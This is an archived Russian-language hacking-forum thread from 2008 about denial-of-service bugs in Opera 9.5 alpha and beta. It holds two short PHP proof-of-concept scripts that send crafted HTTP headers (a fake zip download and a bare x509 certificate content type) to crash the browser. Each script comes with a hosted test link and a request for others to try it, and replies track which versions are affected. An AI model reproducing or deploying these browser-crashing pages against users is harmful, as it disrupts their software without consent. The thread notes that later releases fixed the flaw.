PDA

Просмотр полной версии : Opera 9.5 Alpha DoS Exploit


_kREveDKo_
12.03.2008, 14:32
Наткнулся случайно
<?php
header("HTTP/1.1 200 OK\n");
header("Content-Length: 56862\n");
header("Content-Type: application/x-zip-compressed\n");
header("Last-Modified: Mon, 04 Jun 2007 13:16:24 GMT\n");
header("Accept-Ranges: bytes\n");
header("ETag: \"408f158daaa6c71:496\"\n");
header("Date: Wed, 12 Mar 2008 10:02:34 GMT\n");
?>

Протестить:
http://b00zy.netsec.ru/dos.php

Поверил бру, что на 9.26 не пашет, тестим дальше...
8.5, 9.0, 9.25 тоже не подвержены

m0nzt3r
12.03.2008, 18:09
Проверил бы (у меня 9.50 бетка), но если кто подскажет, как удалить плагин от регета к опере..Вроде удалял, но урл все равно передается к регету и краш происходит(( мучаюсь так давно(

ProTeuS
13.03.2008, 15:44
анинсталь софт. или попробуй то гугл HijackThis и в ней удаляй все висящие в фоне "заразы"

_kREveDKo_
14.03.2008, 00:37
цуки! у кого-нить хоть кроме меня работает? ))

_kREveDKo_
16.03.2008, 15:36
Мммм.. оказалось, что ентот баг присутствует только в ПОРТАБЛ верси этой оперы альфы...

А вот терь я поставил обычную версию 9.5 альфа и... баг не работает, но нашёл новый денай оф сервис со след. пакетом:

http://b00zy.netsec.ru/dos2.php

<?php header("HTTP/1.1 200 OK\n");
header("Content-Type: application/x-x509-ca-cert\n");
?>


На 9.26 и 8.5 не работает.. ребят, попрошу активнее, надо тестить!

blackybr
16.03.2008, 19:56
ie 7 редлагает сохранить сертификат. мозила даже на ссылку не переходит)

_kREveDKo_
16.03.2008, 20:15
да и ie 6.0 собственно так же как и 7. у оперы глюк какой-то с сертификатами

_kREveDKo_
23.03.2008, 13:26
Спущено в паблик

AHTOLLlKA
23.03.2008, 13:47
дос2 работает на:
Version 9.50 beta Build 9755

_kREveDKo_
23.03.2008, 14:15
билд Build 9500 тоже подвержен

_kREveDKo_
17.06.2008, 01:22
Свежий релиз данному косяку не подвержен.

.Slip
17.06.2008, 02:08
Свежий релиз данному косяку не подвержен.
Ога, свежий релиз и без эксплойтов замечательно уходит в даун